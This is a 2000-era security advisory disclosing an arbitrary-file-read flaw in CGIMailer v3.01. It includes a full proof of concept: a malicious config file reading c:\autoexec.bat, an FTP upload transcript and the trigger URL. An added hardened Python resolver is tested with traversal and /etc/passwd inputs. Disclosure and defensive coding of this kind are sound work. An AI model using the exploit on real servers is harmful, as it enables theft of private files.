Advisory: CGIMailer v3.01 for Windows 95/98/2000/NT4.0
Chopsui-cide[MmM]
The Mad Midget Mafia - http://midgets.box.sk/
=======================================================================

Summary:
==========

Date released: 15/03/2000 (dd/mm/yyyy).
Risk: reading of private files.
Vulnerability found by: Chopsui-cide.
Vulnerable: CGIMailer v3.01, probably prior versions (not tested).
Immune: ?

CGIMailer makes use of configuration files which specify certain variables (address to post to, etc.). An attacker can specify his/her own configuration file.

Details:
==========

Anyone who can execute CGIMailer (that is, anyone who can use the forms that call CGIMailer) can specify which configuration file to use, and this can be any file on the system CGIMailer is running on. The file name is taken directly from the request, so there is no restriction to a configuration directory. At a minimum this lets an attacker detect whether private files exist.

There are more dangerous implications, though: this vulnerability could be exploited to obtain private files from the target system. If there is an FTP server running on the target system on which an attacker has upload privileges, he/she could upload a malicious configuration file and then run it through CGIMailer. Configuration files can be used to send files to the attacker via e-mail (among other things).

Implementation:
=================

To demonstrate this problem, I set up Xitami Webserver + Serv-U FTP 2.5d. The target host is therocksays. We have anonymous FTP access in Serv-U FTP with upload privileges to the incoming directory, and Xitami will allow us to execute CGI scripts. This is all we will need to execute the attack.

Here is the configuration file that will send us the contents of autoexec.bat (RESPONSE_TEMPLATE names the file CGIMailer uses as the body of the HTML it returns):

GATEWAY=notneeded.com
PORT=25
FROM=nobody@isp.com
TO=nobody@isp.com
SUBJECT=CGIMailer form
RESPONSE_TEMPLATE=c:\autoexec.bat
REFBASE_ALLOW=

Now to upload it...

D:\>ftp therocksays
Connected to therocksays.
220 Serv-U FTP-Server v2.5d for WinSock ready...
User (therocksays:(none)): anonymous
331 User name okay, please send complete E-mail address as password.
Password:
230 User logged in, proceed.
ftp> dir
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
drwxrwxrwx   1 user     group           0 Mar 15 06:28 incoming
226 Transfer complete.
65 bytes received in 0.00 seconds (65000.00 Kbytes/sec)
ftp> cd incoming
250 Directory changed to /d:/ftproot/incoming
ftp> put test.cf
200 PORT Command successful.
150 Opening ASCII mode data connection for test.cf.
226 Transfer complete.
150 bytes sent in 0.06 seconds (2.50 Kbytes/sec)
ftp> pwd
257 "/d:/ftproot/incoming" is current directory.
ftp>

Serv-U was even kind enough to give us the local path of the config file. Now all we need to do is point our browser at:

http://therocksays/cgi-bin/cgimail?d:\ftproot\incoming\test.cf

The contents of autoexec.bat should be listed at the top of the resulting HTML file. This could have been e-mailed as an attachment to any address we wanted.

=======================================================================
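The root cause above is that the configuration file name arrives in the query string and is opened as-is. The following is an added example (not CGIMailer's own code and not part of the original advisory) of how a CGI should resolve such a parameter instead: a fixed, server-controlled configuration directory, a strict file-name allowlist, and a realpath check that the final path is still inside that directory. The temporary directory, the file name contact.cf and the request strings other than the advisory's own URL are constructed for the demonstration.

```python
"""
Hardened resolution of a CGIMailer-style configuration-file parameter.

Added example, not CGIMailer's code. CGIMailer v3.01 took the configuration
file name straight from the query string
(http://host/cgi-bin/cgimail?d:\\ftproot\\incoming\\test.cf) and opened
whatever path it was given. resolve_config() shows the safe pattern.
"""
import os
import re
import tempfile
from urllib.parse import unquote

# Only bare names of this shape are accepted: no separators, no drive
# letters, no UNC prefixes, no traversal components.
_CONFIG_NAME = re.compile(r"^[A-Za-z0-9_-]{1,32}\.cf$")


class ConfigRejected(ValueError):
    """Raised when the requested configuration file is not allowed."""


def resolve_config(query_string: str, config_dir: str) -> str:
    """Map a raw QUERY_STRING to a configuration file inside config_dir.

    The value is URL-decoded first so that %5C / %2F cannot smuggle a
    separator past the regex. After the allowlist check, realpath verifies
    that the resolved file really lives directly under config_dir, which
    also covers symlinks placed inside the directory.
    """
    name = unquote(query_string).strip()
    if not _CONFIG_NAME.match(name):
        raise ConfigRejected(f"bad configuration name: {name!r}")
    base = os.path.realpath(config_dir)
    candidate = os.path.realpath(os.path.join(base, name))
    # The regex already excludes separators; this is defence in depth.
    if os.path.dirname(candidate) != base:
        raise ConfigRejected(f"escapes config directory: {candidate!r}")
    if not os.path.isfile(candidate):
        raise ConfigRejected(f"no such configuration: {name!r}")
    return candidate


def is_allowed(query_string: str, config_dir: str) -> bool:
    """True if resolve_config() accepts the request, False otherwise."""
    try:
        resolve_config(query_string, config_dir)
        return True
    except ConfigRejected:
        return False


def demo() -> dict:
    """Run the advisory's request and several variants against a temp dir.

    The configuration directory and its single file 'contact.cf' are
    constructed here (assumed names, not from the advisory).
    """
    queries = [
        "contact.cf",                                # legitimate form config
        r"d:\ftproot\incoming\test.cf",              # the advisory's request
        "d%3A%5Cftproot%5Cincoming%5Ctest.cf",       # same request, URL-encoded
        "../../autoexec.bat",                        # traversal
        "/etc/passwd",                               # absolute path
        "missing.cf",                                # well-formed but absent
    ]
    with tempfile.TemporaryDirectory() as config_dir:
        with open(os.path.join(config_dir, "contact.cf"), "w") as fh:
            fh.write("TO=webmaster@example.com\n")
        return {q: is_allowed(q, config_dir) for q in queries}


if __name__ == "__main__":
    for query, ok in demo().items():
        print(f"{'ALLOW' if ok else 'DENY '} {query}")
```

Only the bare name contact.cf is accepted; the advisory's drive-letter path, its URL-encoded form, traversal, absolute paths and a well-formed but non-existent name are all refused before any file is opened. Note that the check on the file name does nothing about what a legitimate configuration file may contain: RESPONSE_TEMPLATE should be validated the same way, since the advisory shows it being pointed at c:\autoexec.bat.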